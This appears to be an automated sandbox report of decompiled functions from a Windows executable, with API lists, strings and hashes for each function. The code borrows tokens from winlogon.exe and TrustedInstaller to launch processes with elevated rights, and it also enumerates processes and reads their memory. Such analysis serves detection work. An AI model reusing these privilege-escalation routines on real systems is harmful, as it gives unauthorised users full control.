Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32 ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

winlogon.exe, xrefs: 00402049, 00402076
TrustedInstaller.exe, xrefs: 0040219C
ServicesActive, xrefs: 0040216D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x00409609
0x0040960f
0x00409619
0x00409623
0x0040962e
0x00409633
0x00409640
0x0040964a
0x00409782
0x0040978c
0x00409793
0x00000000
0x00000000
0x0040965a
0x0040965f
0x00409678
0x0040967e
0x00409681
0x00409685
0x00409688
0x004096b2
0x004096bf
0x004096c6
0x004096cb
0x004096da
0x004096e6
0x0040973b
0x00409747
0x0040975f
0x00409764
0x0040976a
0x00409770
0x00409773
0x0040977d
0x00000000
0x0040977d
0x004096ee
0x004096f5
0x004096fc
0x00409704
0x0040970c
0x0040971c
0x0040971c
0x00409704
0x00409721
0x00409728
0x00409739
0x00409739
0x00000000
0x00409728
0x00409693
0x00000000
0x00000000
0x004096a5
0x004096a9
0x004096ac
0x00000000
0x00000000
0x00000000
0x004096ac
0x004097a6

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

QueryFullProcessImageNameW, xrefs: 00409706
kernel32.dll, xrefs: 004096F7

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

GetModuleFileNameExW, xrefs: 0040994F
psapi.dll, xrefs: 00409927
GetModuleBaseNameW, xrefs: 00409937
EnumProcessModules, xrefs: 00409943
EnumProcesses, xrefs: 0040995B
GetModuleInformation, xrefs: 00409967

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b12
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401be6
0x00401bee
0x00401bf0
0x00401bf0
0x00401c02
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 1126726007-2565891505
Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}

0x00401319
0x0040131b
0x00401327
0x0040132b
0x0040133a
0x0040134b
0x0040134b
0x0040134e
0x0040134e
0x00401353
0x0040135b

APIs

OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353

Strings

TrustedInstaller, xrefs: 00401311

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$OpenQueryStartStatus
String ID: TrustedInstaller
API String ID: 862991418-565535830
Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

